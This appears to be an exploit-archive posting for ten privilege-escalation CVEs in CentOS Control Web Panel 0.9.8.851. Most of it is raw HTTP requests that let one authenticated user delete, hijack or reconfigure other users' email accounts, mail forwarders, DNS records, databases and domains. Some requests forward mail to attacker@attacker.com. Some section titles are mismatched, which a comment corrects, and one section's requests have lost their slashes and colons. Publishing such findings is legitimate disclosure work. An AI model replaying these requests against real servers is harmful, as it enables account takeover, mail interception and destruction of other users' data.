what you don't know can hurt you

Control Web Panel 0.9.8.851 Privilege Escalation

Control Web Panel 0.9.8.851 Privilege Escalation
Posted Sep 9, 2019
Authored by Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak

Control Web Panel version 0.9.8.851 suffers from multiple privilege escalation vulnerabilities.

tags | exploit, web, vulnerability
advisories | CVE-2019-14721, CVE-2019-14722, CVE-2019-14723, CVE-2019-14724, CVE-2019-14725, CVE-2019-14726, CVE-2019-14727, CVE-2019-14728, CVE-2019-14729, CVE-2019-14730
MD5 | 6f60d66e3e8d2b75a2b81b0d30d6bc25

Control Web Panel 0.9.8.851 Privilege Escalation

Change Mirror Download
CVE Number      : CVE-2019-14721, CVE-2019-14722, CVE-2019-14723, CVE-2019-14724, CVE-2019-14725, CVE-2019-14726, CVE-2019-14727, CVE-2019-14728, CVE-2019-14729, CVE-2019-14730

Date : 24 Jul 2019
Exploit Author : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
Vendor Homepage : https://control-webpanel.com/
Software Link : Not available, user panel only available for lastest version
Product Name : CWP (CentOS Control Web Panel)
Version : 0.9.8.851
Tested on : CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)
Reference : https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE
Attack Requirement : Authenticated User

-------------------------------------------------------------------------------------------------------------
CVE-2019-14721 : CWP (CentOS Control Web Panel 0.9.8.851) Remove user from phpMyAdmin via an attacker account
-------------------------------------------------------------------------------------------------------------

POST /cwp_47e1d536a096e42d/alice/alice/index.php?module=mysql_manager&acc=deleteuserdb HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 31
Connection: close
Referer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=mysql_manager
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

user=<TARGET-USER>&host=localhost

-------------------------------------------------------------------------------------------------------------
CVE-2019-14722 : CWP (CentOS Control Web Panel 0.9.8.851) Delete other mail forwarder
-------------------------------------------------------------------------------------------------------------

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=forwardelete HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 7
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

email=<TARGET-EMAIL>

-------------------------------------------------------------------------------------------------------------
CVE-2019-14723 : CWP (CentOS Control Web Panel 0.9.8.851) Delete other email account
-------------------------------------------------------------------------------------------------------------

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=emaildelete HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 21
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

email=<TARGET-EMAIL>

-------------------------------------------------------------------------------------------------------------
CVE-2019-14724 : CWP (CentOS Control Web Panel 0.9.8.851) Access Other DNS and Delete
-------------------------------------------------------------------------------------------------------------

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=updateforwarders HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 14
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

email=bob2@bob2&goto=attacker@attacker.com

-------------------------------------------------------------------------------------------------------------
CVE-2019-14725 : CWP (CentOS Control Web Panel 0.9.8.851) Remove user from phpMyAdmin via an attacker account
-------------------------------------------------------------------------------------------------------------

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=updquotaemail HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 38
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

email=<TARGET-EMAIL>&quota=1048576000

-------------------------------------------------------------------------------------------------------------
CVE-2019-14726 : CWP (CentOS Control Web Panel 0.9.8.851) Modify forward mail destination on victim's account
-------------------------------------------------------------------------------------------------------------

# Access

POST cwp_b99b38b4d4ced310alicealiceindex.phpmodule=dns_zone_editor&acc=paserrecord HTTP1.1
Host 192.168.80.1482083
User-Agent Mozilla5.0 (Windows NT 10.0; Win64; x64; rv68.0) Gecko20100101 Firefox68.0
Accept
Accept-Language en-US,en;q=0.5
Accept-Encoding gzip, deflate
Content-Type applicationx-www-form-urlencoded; charset=UTF-8
csrftoken 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With XMLHttpRequest
Content-Length 16
Connection close
Referer https192.168.80.1482083cwp_b99b38b4d4ced310alicemodule=dns_zone_editor
Cookie PHPSESSID=i2is5am08ru7a2h93e13llp9e2

domain=bob.com

-------------------------------------------------------------------------------

# Delete

POST cwp_b99b38b4d4ced310alicealiceindex.phpmodule=dns_zone_editor&acc=addregdns HTTP1.1
Host 192.168.80.1482083
User-Agent Mozilla5.0 (Windows NT 10.0; Win64; x64; rv68.0) Gecko20100101 Firefox68.0
Accept
Accept-Language en-US,en;q=0.5
Accept-Encoding gzip, deflate
Content-Type applicationx-www-form-urlencoded; charset=UTF-8
csrftoken 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With XMLHttpRequest
Content-Length 111
Connection close
Referer https192.168.80.1482083cwp_b99b38b4d4ced310alicemodule=dns_zone_editor
Cookie PHPSESSID=i2is5am08ru7a2h93e13llp9e2

domain=bob.com&namereg=Attacker.com&valuereg=192.168.10.200&cachereg=14400&reg=A&flag=undefined&tag=undefined

-------------------------------------------------------------------------------------------------------------
CVE-2019-14727 : CWP (CentOS Control Web Panel 0.9.8.851) Change other email password
-------------------------------------------------------------------------------------------------------------

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=changpassemail HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 45
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

email=<TARGET-EMAIL>&pass1email=P@ssw0rd

-------------------------------------------------------------------------------------------------------------
CVE-2019-14728 : CWP (CentOS Control Web Panel 0.9.8.851) Add forward mail to other account
-------------------------------------------------------------------------------------------------------------

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=addforwar HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 73
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

forwaraddres=bob2&domainforwar=bob2&forwarders=attacker@attacker.com

-------------------------------------------------------------------------------------------------------------
CVE-2019-14729 : CWP (CentOS Control Web Panel 0.9.8.851) Delete other sub-domain
-------------------------------------------------------------------------------------------------------------

POST /cwp_47e1d536a096e42d/alice/alice/index.php?module=subdomains&acc=subdomaindelete HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 32
Connection: close
Referer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=subdomains
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

domain=<TARGET-DOMAIN>&subdomain=<TARGET-SUBDOMAIN>

-------------------------------------------------------------------------------------------------------------
CVE-2019-14730 : CWP (CentOS Control Web Panel 0.9.8.851) Delete other domain
-------------------------------------------------------------------------------------------------------------

POST /cwp_47e1d536a096e42d/alice/alice/index.php?module=domains&acc=verifsubdomain HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 12
Connection: close
Referer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=domains
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

domain=<TARGET-DOMAIN>

Comments (1)

RSS Feed Subscribe to this comment feed
i3umi3iei3ii

Update

CVE-2019-14724 : CWP (CentOS Control Web Panel 0.9.8.851) Modify forward mail destination on victim's account

CVE-2019-14725 : CWP (CentOS Control Web Panel 0.9.8.851) Change target mail usage

Comment by i3umi3iei3ii
2019-09-10 18:34:24 UTC | Permalink | Reply
Login or Register to post a comment

File Archive:

October 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    24 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    7 Files
  • 4
    Oct 4th
    4 Files
  • 5
    Oct 5th
    10 Files
  • 6
    Oct 6th
    1 Files
  • 7
    Oct 7th
    21 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    5 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    17 Files
  • 12
    Oct 12th
    4 Files
  • 13
    Oct 13th
    4 Files
  • 14
    Oct 14th
    15 Files
  • 15
    Oct 15th
    19 Files
  • 16
    Oct 16th
    25 Files
  • 17
    Oct 17th
    17 Files
  • 18
    Oct 18th
    3 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close